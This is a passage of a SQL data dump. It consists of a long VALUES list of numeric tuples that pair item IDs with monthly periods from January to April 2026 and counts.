202601',9),(3097,1,'202601',9),(3229,1,'202601',9),(3273,1,'202601',9),(3290,1,'202601',9),(3307,1,'202601',9),(3486,1,'202601',9),(4275,1,'202601',9),(4338,1,'202601',9),(4382,1,'202601',9),(4420,1,'202601',9),(4440,1,'202601',9),(4645,1,'202601',9),(4681,1,'202601',9),(4688,1,'202601',9),(4697,1,'202601',9),(4706,1,'202601',9),(4996,1,'202601',9),(5058,1,'202601',9),(5134,1,'202601',9),(5268,1,'202601',9),(5320,1,'202601',9),(5356,1,'202601',9),(5582,1,'202601',9),(5674,1,'202601',9),(484,1,'202601',10),(486,1,'202601',10),(1749,1,'202601',10),(1766,1,'202601',10),(3034,1,'202601',10),(3045,1,'202601',10),(3107,1,'202601',10),(3261,1,'202601',10),(3282,1,'202601',10),(3710,1,'202601',10),(3721,1,'202601',10),(4238,1,'202601',10),(4976,1,'202601',10),(4977,1,'202601',10),(5062,1,'202601',10),(5323,1,'202601',10),(5578,1,'202601',10),(5585,1,'202601',10),(472,1,'202601',11),(477,1,'202601',11),(480,1,'202601',11),(488,1,'202601',11),(1770,1,'202601',11),(2609,1,'202601',11),(2804,1,'202601',11),(3004,1,'202601',11),(3030,1,'202601',11),(3253,1,'202601',11),(3259,1,'202601',11),(3498,1,'202601',11),(4377,1,'202601',11),(4556,1,'202601',11),(4722,1,'202601',11),(4750,1,'202601',11),(5314,1,'202601',11),(5425,1,'202601',11),(5467,1,'202601',11),(5512,1,'202601',11),(5626,1,'202601',11),(1596,1,'202601',12),(2178,1,'202601',12),(2809,1,'202601',12),(3027,1,'202601',12),(4335,1,'202601',12),(4582,1,'202601',12),(4612,1,'202601',12),(4980,1,'202601',12),(5028,1,'202601',12),(5153,1,'202601',12),(5292,1,'202601',12),(5492,1,'202601',12),(469,1,'202601',13),(476,1,'202601',13),(1592,1,'202601',13),(2457,1,'202601',13),(4301,1,'202601',13),(4663,1,'202601',13),(4712,1,'202601',13),(5259,1,'202601',13),(5280,1,'202601',13),(5307,1,'202601',13),(5567,1,'202601',13),(471,1,'202601',14),(473,1,'202601',14),(570,1,'202601',14),(1614,1,'202601',14),(2704,1,'202601',14),(3746,1,'202601',14),(4436,1,'202601',14),(4529,1,'202601',14),(5076,1,'202601',14),(5441,1,'202601',14),(5561,1,'202601',14),(5593,1,'202601',14),(1711,1,'202601',15),(1778,1,'202601',15),(2503,1,'202601',15),(3023,1,'202601',15),(3764,1,'202601',15),(5601,1,'202601',15),(487,1,'202601',16),(1724,1,'202601',16),(4741,1,'202601',16),(5428,1,'202601',16),(5598,1,'202601',16),(335,1,'202601',17),(3038,1,'202601',17),(3072,1,'202601',17),(5412,1,'202601',17),(5662,1,'202601',17),(1608,1,'202601',18),(2769,1,'202601',18),(3083,1,'202601',18),(3102,1,'202601',18),(3297,1,'202601',18),(3742,1,'202601',18),(4753,1,'202601',18),(5122,1,'202601',18),(5363,1,'202601',18),(5515,1,'202601',18),(5570,1,'202601',18),(87,1,'202601',19),(468,1,'202601',19),(1584,1,'202601',19),(2813,1,'202601',19),(74,1,'202601',20),(1600,1,'202601',20),(3313,1,'202601',20),(4930,1,'202601',20),(5436,1,'202601',20),(2309,1,'202601',21),(5489,1,'202601',21),(5605,1,'202601',21),(84,1,'202601',22),(467,1,'202601',22),(1588,1,'202601',22),(2297,1,'202601',22),(2775,1,'202601',22),(4983,1,'202601',22),(5400,1,'202601',22),(5409,1,'202601',22),(5502,1,'202601',22),(5433,1,'202601',23),(1594,1,'202601',24),(5454,1,'202601',24),(5461,1,'202601',24),(5464,1,'202601',24),(76,1,'202601',25),(3060,1,'202601',25),(5449,1,'202601',25),(5406,1,'202601',26),(5420,1,'202601',26),(108,1,'202601',27),(470,1,'202601',27),(1586,1,'202601',28),(1598,1,'202601',28),(5457,1,'202601',30),(1602,1,'202601',31),(3781,1,'202601',33),(474,1,'202601',35),(1544,1,'202601',35),(2904,1,'202601',36),(1582,1,'202601',37),(91,1,'202601',38),(5033,1,'202601',38),(5397,1,'202601',41),(5683,1,'202601',41),(110,1,'202601',42),(89,1,'202601',47),(72,1,'202601',63),(68,1,'202601',72),(80,1,'202601',198),(9,1,'202601',2178),(3285,1,'202602',1),(4759,1,'202602',1),(5046,1,'202602',1),(471,1,'202602',2),(1697,1,'202602',2),(1709,1,'202602',2),(1743,1,'202602',2),(1782,1,'202602',2),(2248,1,'202602',2),(4428,1,'202602',2),(4448,1,'202602',2),(4591,1,'202602',2),(4792,1,'202602',2),(1707,1,'202602',3),(1720,1,'202602',3),(2154,1,'202602',3),(2296,1,'202602',3),(3249,1,'202602',3),(3251,1,'202602',3),(3273,1,'202602',3),(4332,1,'202602',3),(4587,1,'202602',3),(4756,1,'202602',3),(4883,1,'202602',3),(4897,1,'202602',3),(5042,1,'202602',3),(2161,1,'202602',4),(3257,1,'202602',4),(3727,1,'202602',4),(4238,1,'202602',4),(4373,1,'202602',4),(4391,1,'202602',4),(4424,1,'202602',4),(4444,1,'202602',4),(4697,1,'202602',4),(4700,1,'202602',4),(4858,1,'202602',4),(4878,1,'202602',4),(5058,1,'202602',4),(5256,1,'202602',4),(5356,1,'202602',4),(478,1,'202602',5),(1695,1,'202602',5),(1699,1,'202602',5),(1718,1,'202602',5),(1726,1,'202602',5),(1737,1,'202602',5),(1768,1,'202602',5),(2148,1,'202602',5),(3097,1,'202602',5),(3777,1,'202602',5),(4338,1,'202602',5),(4660,1,'202602',5),(4797,1,'202602',5),(4888,1,'202602',5),(5067,1,'202602',5),(5289,1,'202602',5),(5359,1,'202602',5),(5585,1,'202602',5),(2293,1,'202602',6),(3107,1,'202602',6),(3261,1,'202602',6),(3771,1,'202602',6),(4326,1,'202602',6),(4404,1,'202602',6),(4440,1,'202602',6),(4677,1,'202602',6),(4691,1,'202602',6),(5024,1,'202602',6),(5054,1,'202602',6),(5137,1,'202602',6),(5425,1,'202602',6),(5582,1,'202602',6),(5609,1,'202602',6),(1610,1,'202602',7),(1732,1,'202602',7),(2751,1,'202602',7),(2965,1,'202602',7),(3430,1,'202602',7),(3479,1,'202602',7),(3714,1,'202602',7),(4387,1,'202602',7),(4396,1,'202602',7),(4608,1,'202602',7),(4654,1,'202602',7),(4681,1,'202602',7),(4685,1,'202602',7),(5310,1,'202602',7),(5383,1,'202602',7),(5578,1,'202602',7),(479,1,'202602',8),(486,1,'202602',8),(1703,1,'202602',8),(3092,1,'202602',8),(3265,1,'202602',8),(4657,1,'202602',8),(4706,1,'202602',8),(4765,1,'202602',8),(4870,1,'202602',8),(5020,1,'202602',8),(5071,1,'202602',8),(5163,1,'202602',8),(5248,1,'202602',8),(5326,1,'202602',8),(5626,1,'202602',8),(106,1,'202602',9),(477,1,'202602',9),(482,1,'202602',9),(483,1,'202602',9),(1590,1,'202602',9),(1592,1,'202602',9),(2063,1,'202602',9),(2991,1,'202602',9),(3038,1,'202602',9),(3245,1,'202602',9),(3280,1,'202602',9),(3316,1,'202602',9),(3752,1,'202602',9),(3774,1,'202602',9),(4357,1,'202602',9),(4377,1,'202602',9),(4674,1,'202602',9),(4771,1,'202602',9),(4862,1,'202602',9),(4893,1,'202602',9),(5037,1,'202602',9),(5415,1,'202602',9),(5561,1,'202602',9),(5636,1,'202602',9),(5674,1,'202602',9),(102,1,'202602',10),(1715,1,'202602',10),(1776,1,'202602',10),(2165,1,'202602',10),(2558,1,'202602',10),(2748,1,'202602',10),(3004,1,'202602',10),(3127,1,'202602',10),(3247,1,'202602',10),(3271,1,'202602',10),(4301,1,'202602',10),(4420,1,'202602',10),(4457,1,'202602',10),(4529,1,'202602',10),(4551,1,'202602',10),(4566,1,'202602',10),(4663,1,'202602',10),(4694,1,'202602',10),(4709,1,'202602',10),(4768,1,'202602',10),(4866,1,'202602',10),(4874,1,'202602',10),(5122,1,'202602',10),(5271,1,'202602',10),(5323,1,'202602',10),(5472,1,'202602',10),(5567,1,'202602',10),(488,1,'202602',11),(1701,1,'202602',11),(1741,1,'202602',11),(1745,1,'202602',11),(2150,1,'202602',11),(2159,1,'202602',11),(3087,1,'202602',11),(3104,1,'202602',11),(3109,1,'202602',11),(3486,1,'202602',11),(3534,1,'202602',11),(4275,1,'202602',11),(4341,1,'202602',11),(4400,1,'202602',11),(4514,1,'202602',11),(4546,1,'202602',11),(4741,1,'202602',11),(4976,1,'202602',11),(4983,1,'202602',11),(5028,1,'202602',11),(5131,1,'202602',11),(5146,1,'202602',11),(5253,1,'202602',11),(5330,1,'202602',11),(485,1,'202602',12),(1705,1,'202602',12),(1730,1,'202602',12),(1734,1,'202602',12),(2156,1,'202602',12),(2178,1,'202602',12),(2457,1,'202602',12),(2769,1,'202602',12),(3041,1,'202602',12),(3045,1,'202602',12),(3090,1,'202602',12),(3226,1,'202602',12),(3282,1,'202602',12),(3438,1,'202602',12),(3489,1,'202602',12),(3731,1,'202602',12),(3738,1,'202602',12),(4363,1,'202602',12),(4977,1,'202602',12),(5050,1,'202602',12),(5157,1,'202602',12),(5317,1,'202602',12),(5320,1,'202602',12),(5378,1,'202602',12),(5492,1,'202602',12),(472,1,'202602',13),(480,1,'202602',13),(481,1,'202602',13),(484,1,'202602',13),(487,1,'202602',13),(1606,1,'202602',13),(1608,1,'202602',13),(1739,1,'202602',13),(1774,1,'202602',13),(2964,1,'202602',13),(2993,1,'202602',13),(3030,1,'202602',13),(3034,1,'202602',13),(3069,1,'202602',13),(3072,1,'202602',13),(3482,1,'202602',13),(3498,1,'202602',13),(3721,1,'202602',13),(3764,1,'202602',13),(4412,1,'202602',13),(4436,1,'202602',13),(4651,1,'202602',13),(4703,1,'202602',13),(4722,1,'202602',13),(4744,1,'202602',13),(4750,1,'202602',13),(5153,1,'202602',13),(5292,1,'202602',13),(5374,1,'202602',13),(5512,1,'202602',13),(5662,1,'202602',13),(1596,1,'202602',14),(1722,1,'202602',14),(1749,1,'202602',14),(3229,1,'202602',14),(3263,1,'202602',14),(3735,1,'202602',14),(4432,1,'202602',14),(4517,1,'202602',14),(4520,1,'202602',14),(4524,1,'202602',14),(4648,1,'202602',14),(4762,1,'202602',14),(5033,1,'202602',14),(5140,1,'202602',14),(5264,1,'202602',14),(5298,1,'202602',14),(5307,1,'202602',14),(1594,1,'202602',15),(1604,1,'202602',15),(1711,1,'202602',15),(1751,1,'202602',15),(1770,1,'202602',15),(2989,1,'202602',15),(3096,1,'202602',15),(3287,1,'202602',15),(3749,1,'202602',15),(4323,1,'202602',15),(4416,1,'202602',15),(4542,1,'202602',15),(4556,1,'202602',15),(4645,1,'202602',15),(4747,1,'202602',15),(5268,1,'202602',15),(5276,1,'202602',15),(5570,1,'202602',15),(5593,1,'202602',15),(469,1,'202602',16),(1780,1,'202602',16),(2297,1,'202602',16),(2617,1,'202602',16),(5062,1,'202602',16),(5076,1,'202602',16),(5428,1,'202602',16),(5441,1,'202602',16),(5666,1,'202602',16),(1747,1,'202602',17),(3102,1,'202602',17),(3124,1,'202602',17),(3253,1,'202602',17),(3269,1,'202602',17),(3278,1,'202602',17),(3297,1,'202602',17),(3313,1,'202602',17),(3742,1,'202602',17),(4612,1,'202602',17),(4688,1,'202602',17),(5101,1,'202602',17),(5314,1,'202602',17),(335,1,'202602',18),(473,1,'202602',18),(476,1,'202602',18),(1713,1,'202602',18),(1766,1,'202602',18),(1772,1,'202602',18),(3005,1,'202602',18),(3006,1,'202602',18),(3063,1,'202602',18),(3079,1,'202602',18),(3243,1,'202602',18),(3267,1,'202602',18),(3541,1,'202602',18),(3724,1,'202602',18),(4329,1,'202602',18),(4582,1,'202602',18),(4802,1,'202602',18),(4996,1,'202602',18),(5295,1,'202602',18),(5301,1,'202602',18),(5304,1,'202602',18),(5363,1,'202602',18),(5400,1,'202602',18),(5412,1,'202602',18),(5467,1,'202602',18),(5605,1,'202602',18),(2252,1,'202602',19),(2804,1,'202602',19),(2956,1,'202602',19),(3023,1,'202602',19),(3746,1,'202602',19),(4408,1,'202602',19),(4454,1,'202602',19),(4980,1,'202602',19),(5125,1,'202602',19),(1598,1,'202602',20),(2801,1,'202602',20),(3275,1,'202602',20),(3307,1,'202602',20),(4988,1,'202602',20),(5080,1,'202602',20),(5334,1,'202602',20),(5601,1,'202602',20),(87,1,'202602',21),(110,1,'202602',21),(467,1,'202602',21),(468,1,'202602',21),(1614,1,'202602',21),(2911,1,'202602',21),(3710,1,'202602',21),(5461,1,'202602',21),(5598,1,'202602',21),(570,1,'202602',22),(1586,1,'202602',22),(1600,1,'202602',22),(1728,1,'202602',22),(2152,1,'202602',22),(2658,1,'202602',22),(3027,1,'202602',22),(3066,1,'202602',22),(3083,1,'202602',22),(3117,1,'202602',22),(3240,1,'202602',22),(3259,1,'202602',22),(4368,1,'202602',22),(5134,1,'202602',22),(5353,1,'202602',22),(5515,1,'202602',22),(74,1,'202602',23),(1724,1,'202602',23),(3531,1,'202602',23),(4335,1,'202602',23),(4776,1,'202602',23),(1612,1,'202602',24),(1778,1,'202602',24),(2609,1,'202602',24),(2904,1,'202602',24),(4382,1,'202602',24),(5128,1,'202602',24),(2809,1,'202602',25),(4712,1,'202602',25),(5436,1,'202602',25),(1584,1,'202602',26),(4753,1,'202602',26),(4930,1,'202602',26),(5280,1,'202602',26),(5409,1,'202602',26),(5502,1,'202602',26),(5683,1,'202602',26),(108,1,'202602',27),(474,1,'202602',27),(3290,1,'202602',27),(4668,1,'202602',27),(5449,1,'202602',27),(5464,1,'202602',27),(470,1,'202602',28),(2503,1,'202602',28),(5259,1,'202602',28),(5433,1,'202602',28),(84,1,'202602',29),(2704,1,'202602',29),(1588,1,'202602',31),(2775,1,'202602',31),(5457,1,'202602',31),(76,1,'202602',33),(2309,1,'202602',33),(5489,1,'202602',33),(2813,1,'202602',34),(5420,1,'202602',35),(3781,1,'202602',38),(91,1,'202602',39),(5397,1,'202602',39),(5454,1,'202602',39),(5406,1,'202602',40),(3060,1,'202602',41),(5696,1,'202602',42),(1602,1,'202602',45),(89,1,'202602',46),(1582,1,'202602',49),(1544,1,'202602',51),(68,1,'202602',72),(72,1,'202602',76),(80,1,'202602',204),(9,1,'202602',2143),(3109,1,'202603',1),(5050,1,'202603',1),(1741,1,'202603',2),(2293,1,'202603',2),(3243,1,'202603',2),(3259,1,'202603',2),(3269,1,'202603',2),(3287,1,'202603',2),(4275,1,'202603',2),(4706,1,'202603',2),(4870,1,'202603',2),(5046,1,'202603',2),(106,1,'202603',3),(2296,1,'202603',3),(3092,1,'202603',3),(3096,1,'202603',3),(3263,1,'202603',3),(3271,1,'202603',3),(3278,1,'202603',3),(3531,1,'202603',3),(3710,1,'202603',3),(4408,1,'202603',3),(4797,1,'202603',3),(4858,1,'202603',3),(5024,1,'202603',3),(5042,1,'202603',3),(5071,1,'202603',3),(5301,1,'202603',3),(5359,1,'202603',3),(1709,1,'202603',4),(1732,1,'202603',4),(1743,1,'202603',4),(1747,1,'202603',4),(1772,1,'202603',4),(1776,1,'202603',4),(2148,1,'202603',4),(2156,1,'202603',4),(2161,1,'202603',4),(2558,1,'202603',4),(2748,1,'202603',4),(3079,1,'202603',4),(3097,1,'202603',4),(3104,1,'202603',4),(3124,1,'202603',4),(3229,1,'202603',4),(3253,1,'202603',4),(3280,1,'202603',4),(3479,1,'202603',4),(3489,1,'202603',4),(3714,1,'202603',4),(3727,1,'202603',4),(3735,1,'202603',4),(4357,1,'202603',4),(4368,1,'202603',4),(4377,1,'202603',4),(4396,1,'202603',4),(4448,1,'202603',4),(4591,1,'202603',4),(4700,1,'202603',4),(4709,1,'202603',4),(4862,1,'202603',4),(4866,1,'202603',4),(4893,1,'202603',4),(4897,1,'202603',4),(4988,1,'202603',4),(5020,1,'202603',4),(5037,1,'202603',4),(5058,1,'202603',4),(5378,1,'202603',4),(5609,1,'202603',4),(1606,1,'202603',5),(1695,1,'202603',5),(1720,1,'202603',5),(1751,1,'202603',5),(2165,1,'202603',5),(2617,1,'202603',5),(2989,1,'202603',5),(3107,1,'202603',5),(3247,1,'202603',5),(3249,1,'202603',5),(3275,1,'202603',5),(3541,1,'202603',5),(3742,1,'202603',5),(4323,1,'202603',5),(4329,1,'202603',5),(4332,1,'202603',5),(4373,1,'202603',5),(4428,1,'202603',5),(4546,1,'202603',5),(4566,1,'202603',5),(4608,1,'202603',5),(4651,1,'202603',5),(4677,1,'202603',5),(4685,1,'202603',5),(4691,1,'202603',5),(4697,1,'202603',5),(4703,1,'202603',5),(4762,1,'202603',5),(4996,1,'202603',5),(5028,1,'202603',5),(5304,1,'202603',5),(5374,1,'202603',5),(5383,1,'202603',5),(482,1,'202603',6),(1697,1,'202603',6),(1699,1,'202603',6),(1713,1,'202603',6),(1737,1,'202603',6),(2154,1,'202603',6),(2252,1,'202603',6),(2956,1,'202603',6),(2991,1,'202603',6),(3045,1,'202603',6),(3226,1,'202603',6),(3240,1,'202603',6),(3245,1,'202603',6),(3251,1,'202603',6),(3257,1,'202603',6),(3273,1,'202603',6),(3285,1,'202603',6),(3307,1,'202603',6),(3430,1,'202603',6),(3764,1,'202603',6),(3771,1,'202603',6),(4301,1,'202603',6),(4326,1,'202603',6),(4363,1,'202603',6),(4416,1,'202603',6),(4432,1,'202603',6),(4444,1,'202603',6),(4542,1,'202603',6),(4648,1,'202603',6),(4747,1,'202603',6),(4792,1,'202603',6),(4888,1,'202603',6),(5054,1,'202603',6),(5067,1,'202603',6),(5101,1,'202603',6),(5122,1,'202603',6),(5128,1,'202603',6),(5467,1,'202603',6),(5472,1,'202603',6),(477,1,'202603',7),(480,1,'202603',7),(485,1,'202603',7),(488,1,'202603',7),(1590,1,'202603',7),(1739,1,'202603',7),(1745,1,'202603',7),(1749,1,'202603',7),(1768,1,'202603',7),(2159,1,'202603',7),(2993,1,'202603',7),(3004,1,'202603',7),(3066,1,'202603',7),(3265,1,'202603',7),(3316,1,'202603',7),(3482,1,'202603',7),(3498,1,'202603',7),(3534,1,'202603',7),(3721,1,'202603',7),(3749,1,'202603',7),(3777,1,'202603',7),(4338,1,'202603',7),(4341,1,'202603',7),(4382,1,'202603',7),(4387,1,'202603',7),(4391,1,'202603',7),(4412,1,'202603',7),(4454,1,'202603',7),(4657,1,'202603',7),(4668,1,'202603',7),(4681,1,'202603',7),(4694,1,'202603',7),(4802,1,'202603',7),(5080,1,'202603',7),(5134,1,'202603',7),(5248,1,'202603',7),(5310,1,'202603',7),(5317,1,'202603',7),(5356,1,'202603',7),(481,1,'202603',8),(1610,1,'202603',8),(1701,1,'202603',8),(1707,1,'202603',8),(1718,1,'202603',8),(1724,1,'202603',8),(1734,1,'202603',8),(1770,1,'202603',8),(2248,1,'202603',8),(2609,1,'202603',8),(2911,1,'202603',8),(2965,1,'202603',8),(3027,1,'202603',8),(3127,1,'202603',8),(3261,1,'202603',8),(3282,1,'202603',8),(3290,1,'202603',8),(3486,1,'202603',8),(3724,1,'202603',8),(3738,1,'202603',8),(3774,1,'202603',8),(4400,1,'202603',8),(4424,1,'202603',8),(4457,1,'202603',8),(4514,1,'202603',8),(4582,1,'202603',8),(4756,1,'202603',8),(4759,1,'202603',8),(4765,1,'202603',8),(4768,1,'202603',8),(4771,1,'202603',8),(5033,1,'202603',8),(5146,1,'202603',8),(5314,1,'202603',8),(5320,1,'202603',8),(5353,1,'202603',8),(5461,1,'202603',8),(471,1,'202603',9),(472,1,'202603',9),(479,1,'202603',9),(483,1,'202603',9),(486,1,'202603',9),(1774,1,'202603',9),(1780,1,'202603',9),(2751,1,'202603',9),(3038,1,'202603',9),(3087,1,'202603',9),(3438,1,'202603',9),(3752,1,'202603',9),(4517,1,'202603',9),(4645,1,'202603',9),(4674,1,'202603',9),(4688,1,'202603',9),(4744,1,'202603',9),(5131,1,'202603',9),(5140,1,'202603',9),(5289,1,'202603',9),(5412,1,'202603',9),(5449,1,'202603',9),(5585,1,'202603',9),(484,1,'202603',10),(1782,1,'202603',10),(2063,1,'202603',10),(2150,1,'202603',10),(3006,1,'202603',10),(3041,1,'202603',10),(3069,1,'202603',10),(4440,1,'202603',10),(4524,1,'202603',10),(5295,1,'202603',10),(5330,1,'202603',10),(5334,1,'202603',10),(5683,1,'202603',10),(476,1,'202603',11),(478,1,'202603',11),(1612,1,'202603',11),(1726,1,'202603',11),(1766,1,'202603',11),(2658,1,'202603',11),(3034,1,'202603',11),(4420,1,'202603',11),(4587,1,'202603',11),(4654,1,'202603',11),(4712,1,'202603',11),(4878,1,'202603',11),(4883,1,'202603',11),(5298,1,'202603',11),(5326,1,'202603',11),(5492,1,'202603',11),(5601,1,'202603',11),(5605,1,'202603',11),(5662,1,'202603',11),(1604,1,'202603',12),(1715,1,'202603',12),(2964,1,'202603',12),(3117,1,'202603',12),(3746,1,'202603',12),(4404,1,'202603',12),(4722,1,'202603',12),(4750,1,'202603',12),(5256,1,'202603',12),(5280,1,'202603',12),(5433,1,'202603',12),(5582,1,'202603',12),(5593,1,'202603',12),(5636,1,'202603',12),(102,1,'202603',13),(1592,1,'202603',13),(1596,1,'202603',13),(1705,1,'202603',13),(1711,1,'202603',13),(2309,1,'202603',13),(2801,1,'202603',13),(3090,1,'202603',13),(3267,1,'202603',13),(3731,1,'202603',13),(4551,1,'202603',13),(4741,1,'202603',13),(4874,1,'202603',13),(4977,1,'202603',13),(5253,1,'202603',13),(5268,1,'202603',13),(5276,1,'202603',13),(5441,1,'202603',13),(5464,1,'202603',13),(110,1,'202603',14),(3023,1,'202603',14),(3030,1,'202603',14),(4520,1,'202603',14),(4663,1,'202603',14),(4776,1,'202603',14),(4980,1,'202603',14),(4983,1,'202603',14),(5125,1,'202603',14),(5137,1,'202603',14),(5264,1,'202603',14),(5323,1,'202603',14),(5425,1,'202603',14),(5598,1,'202603',14),(473,1,'202603',15),(1584,1,'202603',15),(1703,1,'202603',15),(2457,1,'202603',15),(2813,1,'202603',15),(3297,1,'202603',15),(4238,1,'202603',15),(4436,1,'202603',15),(4556,1,'202603',15),(4660,1,'202603',15),(5062,1,'202603',15),(5292,1,'202603',15),(5415,1,'202603',15),(1594,1,'202603',16),(1730,1,'202603',16),(2152,1,'202603',16),(2178,1,'202603',16),(2775,1,'202603',16),(2809,1,'202603',16),(3005,1,'202603',16),(3063,1,'202603',16),(3072,1,'202603',16),(5157,1,'202603',16),(5666,1,'202603',16),(468,1,'202603',17),(487,1,'202603',17),(1728,1,'202603',17),(3060,1,'202603',17),(3313,1,'202603',17),(4529,1,'202603',17),(4612,1,'202603',17),(4976,1,'202603',17),(5163,1,'202603',17),(5271,1,'202603',17),(5578,1,'202603',17),(74,1,'202603',18),(1778,1,'202603',18),(3083,1,'202603',18),(4335,1,'202603',18),(4753,1,'202603',18),(5397,1,'202603',18),(5489,1,'202603',18),(1608,1,'202603',19),(2804,1,'202603',19),(5307,1,'202603',19),(5400,1,'202603',19),(469,1,'202603',20),(5567,1,'202603',20),(570,1,'202603',21),(1722,1,'202603',21),(5363,1,'202603',21),(5409,1,'202603',21),(5515,1,'202603',21),(5561,1,'202603',21),(5626,1,'202603',21),(1586,1,'202603',22),(3102,1,'202603',22),(5436,1,'202603',23),(5457,1,'202603',23),(5570,1,'202603',23),(5153,1,'202603',24),(335,1,'202603',25),(1588,1,'202603',25),(5406,1,'202603',25),(2704,1,'202603',26),(5428,1,'202603',26),(5512,1,'202603',26),(5674,1,'202603',26),(87,1,'202603',27),(84,1,'202603',28),(2297,1,'202603',28),(5076,1,'202603',28),(2503,1,'202603',29),(4930,1,'202603',29),(470,1,'202603',30),(1614,1,'202603',30),(1600,1,'202603',31),(5454,1,'202603',31),(1602,1,'202603',32),(3781,1,'202603',32),(5420,1,'202603',32),(467,1,'202603',33),(1544,1,'202603',34),(5502,1,'202603',34),(108,1,'202603',35),(474,1,'202603',36),(2904,1,'202603',36),(2769,1,'202603',37),(5259,1,'202603',38),(1598,1,'202603',40),(5696,1,'202603',44),(91,1,'202603',46),(89,1,'202603',48),(1582,1,'202603',50),(72,1,'202603',67),(68,1,'202603',78),(76,1,'202603',87),(80,1,'202603',192),(9,1,'202603',3202),(1768,1,'202604',1),(3097,1,'202604',1),(3247,1,'202604',1),(3249,1,'202604',1),(4408,1,'202604',1),(4440,1,'202604',1),(106,1,'202604',2),(1699,1,'202604',2),(1747,1,'202604',2),(2165,1,'202604',2),(3127,1,'202604',2),(4591,1,'202604',2),(5301,1,'202604',2),(1707,1,'202604',3),(1713,1,'202604',3),(1726,1,'202604',3),(1730,1,'202604',3),(2150,1,'202604',3),(2178,1,'202604',3),(3030,1,'202604',3),(3066,1,'202604',3),(3096,1,'202604',3),(3263,1,'202604',3),(3275,1,'202604',3),(3285,1,'202604',3),(3290,1,'202604',3),(3482,1,'202604',3),(3489,1,'202604',3),(4377,1,'202604',3),(4404,1,'202604',3),(4412,1,'202604',3),(4444,1,'202604',3),(4542,1,'202604',3),(4546,1,'202604',3),(4697,1,'202604',3),(4759,1,'202604',3),(4988,1,'202604',3),(5137,1,'202604',3),(5157,1,'202604',3),(5304,1,'202604',3),(1711,1,'202604',4),(1720,1,'202604',4),(1751,1,'202604',4),(1774,1,'202604',4),(2161,1,'202604',4),(2248,1,'202604',4),(2993,1,'202604',4),(3027,1,'202604',4),(3107,1,'202604',4),(3273,1,'202604',4),(3280,1,'202604',4),(3316,1,'202604',4),(3430,1,'202604',4),(3438,1,'202604',4),(3738,1,'202604',4),(3771,1,'202604',4),(4382,1,'202604',4),(4396,1,'202604',4),(4428,1,'202604',4),(4514,1,'202604',4),(4582,1,'202604',4),(4668,1,'202604',4),(4685,1,'202604',4),(4700,1,'202604',4),(4747,1,'202604',4),(4802,1,'202604',4),(4858,1,'202604',4),(5020,1,'202604',4),(5140,1,'202604',4),(5253,1,'202604',4),(5356,1,'202604',4),(5585,1,'202604',4),(478,1,'202604',5),(479,1,'202604',5),(485,1,'202604',5),(488,1,'202604',5),(1590,1,'202604',5),(1596,1,'202604',5),(1709,1,'202604',5),(1715,1,'202604',5),(1732,1,'202604',5),(1741,1,'202604',5),(1749,1,'202604',5),(2156,1,'202604',5),(2252,1,'202604',5),(2293,1,'202604',5),(3034,1,'202604',5),(3063,1,'202604',5),(3251,1,'202604',5),(3257,1,'202604',5),(3261,1,'202604',5),(3265,1,'202604',5),(3271,1,'202604',5),(3714,1,'202604',5),(3742,1,'202604',5),(4357,1,'202604',5),(4368,1,'202604',5),(4424,1,'202604',5),(4524,1,'202604',5),(4654,1,'202604',5),(4663,1,'202604',5),(4681,1,'202604',5),(4694,1,'202604',5),(4771,1,'202604',5),(4792,1,'202604',5),(4866,1,'202604',5),(5033,1,'202604',5),(5289,1,'202604',5),(5310,1,'202604',5),(5374,1,'202604',5),(482,1,'202604',6),(486,1,'202604',6),(1592,1,'202604',6),(1697,1,'202604',6),(1782,1,'202604',6),(2063,1,'202604',6),(2296,1,'202604',6),(2558,1,'202604',6),(2609,1,'202604',6),(2964,1,'202604',6),(3038,1,'202604',6),(3069,1,'202604',6),(3072,1,'202604',6),(3079,1,'202604',6),(3090,1,'202604',6),(3229,1,'202604',6),(3245,1,'202604',6),(3269,1,'202604',6),(3287,1,'202604',6),(3486,1,'202604',6),(3710,1,'202604',6),(3735,1,'202604',6),(4332,1,'202604',6),(4363,1,'202604',6),(4373,1,'202604',6),(4387,1,'202604',6),(4391,1,'202604',6),(4416,1,'202604',6),(4457,1,'202604',6),(4517,1,'202604',6),(4551,1,'202604',6),(4657,1,'202604',6),(4688,1,'202604',6),(4703,1,'202604',6),(4709,1,'202604',6),(4744,1,'202604',6),(4756,1,'202604',6),(4762,1,'202604',6),(4765,1,'202604',6),(4797,1,'202604',6),(4862,1,'202604',6),(4878,1,'202604',6),(4976,1,'202604',6),(5037,1,'202604',6),(5042,1,'202604',6),(5050,1,'202604',6),(5134,1,'202604',6),(5146,1,'202604',6),(5248,1,'202604',6),(5264,1,'202604',6),(5295,1,'202604',6),(5326,1,'202604',6),(5330,1,'202604',6),(480,1,'202604',7),(1722,1,'202604',7),(1743,1,'202604',7),(1745,1,'202604',7),(1770,1,'202604',7),(1772,1,'202604',7),(2658,1,'202604',7),(2911,1,'202604',7),(2965,1,'202604',7),(2991,1,'202604',7),(3004,1,'202604',7),(3005,1,'202604',7),(3006,1,'202604',7),(3092,1,'202604',7),(3109,1,'202604',7),(3226,1,'202604',7),(3253,1,'202604',7),(3267,1,'202604',7),(3282,1,'202604',7),(3498,1,'202604',7),(3541,1,'202604',7),(3727,1,'202604',7),(4341,1,'202604',7),(4566,1,'202604',7),(4587,1,'202604',7),(4648,1,'202604',7),(4883,1,'202604',7),(4893,1,'202604',7),(4897,1,'202604',7),(4977,1,'202604',7),(5024,1,'202604',7),(5028,1,'202604',7),(5101,1,'202604',7),(5122,1,'202604',7),(5131,1,'202604',7),(5320,1,'202604',7),(5334,1,'202604',7),(5383,1,'202604',7),(477,1,'202604',8),(481,1,'202604',8),(484,1,'202604',8),(1594,1,'202604',8),(1695,1,'202604',8),(1737,1,'202604',8),(1776,1,'202604',8),(2152,1,'202604',8),(2154,1,'202604',8),(2159,1,'202604',8),(2457,1,'202604',8),(2617,1,'202604',8),(2748,1,'202604',8),(2801,1,'202604',8),(3045,1,'202604',8),(3087,1,'202604',8),(3104,1,'202604',8),(3243,1,'202604',8),(3278,1,'202604',8),(3479,1,'202604',8),(3752,1,'202604',8),(3764,1,'202604',8),(4275,1,'202604',8),(4301,1,'202604',8),(4432,1,'202604',8),(4454,1,'202604',8),(4645,1,'202604',8),(4660,1,'202604',8),(4677,1,'202604',8),(4706,1,'202604',8),(4768,1,'202604',8),(4870,1,'202604',8),(4888,1,'202604',8),(5062,1,'202604',8),(5256,1,'202604',8),(5378,1,'202604',8),(472,1,'202604',9),(473,1,'202604',9),(1612,1,'202604',9),(1718,1,'202604',9),(2148,1,'202604',9),(3124,1,'202604',9),(3240,1,'202604',9),